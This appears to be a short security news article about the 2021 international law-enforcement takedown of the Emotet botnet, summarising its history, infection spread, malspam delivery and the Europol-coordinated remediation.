In a recent international law enforcement effort, agencies dismantled the infrastructure supporting Emotet. As of July 2020, a global threat index showed that Emotet impacted 5% of organizations, worldwide. By early 2021, Emotet had disrupted 19% of organizations around the world.

Check Point expert Lotem Finklestein says calls Emotet, “The most successful and prevalent malware of 2020 by a long shot.” Emotet earned its reputation due to its dynamic nature, technical features, and the organized business model supporting it.

When did Emotet first emerge on the scene?

Emotet is known as one of the world’s largest botnets. It has existed since 2014. Initially a banking trojan, Emotet was created to spy on victims’ banking login credentials.

While easily discoverable by malware tools, Emotet evolved into a malware-as-a-service platform that saw extensive use.

The US Department of Homeland Security estimates that incidents involving Emotet cost organizations over $1M, on average.

How did Emotet work? 

Emotet launched malspam campaigns. These campaigns included malicious attachments. The attachments would leverage a PowerShell to move the Emotet binary from remote websites and machines, adding them to the botnet.

The botnet grew in size and capabilities over time.

Emotet also retained worm-like capabilities. Moving from machine to machine across a network was one of its strengths. Emotet was difficult to detect. Most victims could not detect it until long after the infection.

What made the Emotet botnet so successful? 

Emotet is considered an advanced, self-propagating and modular Trojan. In a single year, the botnet managed to deliver phishing emails with more than 150,000 unique subject lines and 100,000 different file names for the attachments.

The internationally coordinated response

Authorities were able to disrupt Emotet from the inside. “This operation is the result of a collaborative effort between…the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada and Ukraine, with international activity coordinated by Eropol and Eurojust,” stated Europol.

Two of the three Emotet command and control servers were located in the Netherlands. The Dutch police report that an operation is in place to “reset Emotet“.

Newly deployed software is expected to release a time-bomb-like code that will uninstall Emotet malware on all computers, worldwide, on April 25th, 2021.

Who created Emotet?

The Emotet botnet was controlled by a group known as TA452, which provided the software to the group that runs TrickBot. Those who run TrickBot are known for disseminating business-destroying Ryuk ransomware.

Emotet’s operators are unique in that they collaborated with other organized crime groups. This allowed them to net higher gains. It’s also part of how Emotet’s operators gained a foothold in so many organizations.

An investigation into the identity of the criminals responsible for running Emotet is still ongoing.

An under-the-radar Emotet botnet attack? 

Do you suspect that your organization may have been compromised by Emotet?  Visit the Dutch website that can help you check. The website was established by the Dutch national police. The text can be translated into English.

For organizations that have been hit by Emotet

“As part of the global remediation strategy…information was distributed worldwide via the network of so-called Computer Emergency Response Teams (CERTs),” says Europol.

For more on botnets and Emotet, visit the BBC.